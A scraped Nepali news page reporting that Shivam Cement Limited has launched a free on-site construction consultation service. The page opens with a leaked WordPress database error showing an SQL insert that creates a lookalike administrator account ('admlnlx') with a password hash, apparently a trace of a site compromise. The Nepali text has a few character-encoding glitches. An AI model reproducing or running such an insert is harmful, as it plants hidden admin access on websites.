WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjPl/Rk2meJOQBIj6gRk6V.gzGmxbL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:11:25', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ३–
दिगो निर्माणको लक्ष्य बोकी वर्षाैं देखि ग्राहकहरुलाई गुणस्तरीय शिवम सिमेन्ट पस्कदै आएको नेपालको एक अग्रणी सिमेन्ट उत्पादक कम्पनी शिवम् सिमेन्ट लिमिटेडले निःशुल्क निर्माण विज्ञ परामर्श सेवा सुरु गरेको छ ।
घर तथा अन्य भवन निर्माणकर्ताहरुका लागि निर्माण स्थलमै पुगी निर्माण विशेषज्ञ प्राविधिक टोली मार्पmत विभिन्न प्राविधिक परामर्श तथा परीक्षण सेवा निःशुल्क रुपमा प्रदान गर्दै आएको छ । यस सेवालाई अझ धेरै भन्दा धेरै ग्राहक एवं निर्माणकर्ताहरुका निर्माण स्थलहरुसम्म पु¥याउने लक्ष्यबोकी “गुणस्तरमा सम्झौता नगरौं” र“मजबुत निर्माण प्रतिहाम्रो प्रतिबद्धता”भन्ने नाराका साथ संस्थागत सामाजिक उत्तरदायित्व अन्तरगतको यस अभियानलाई झनै वृहत र प्रभावकारी रुपमा सञ्चालन सुरु गरेको छ ।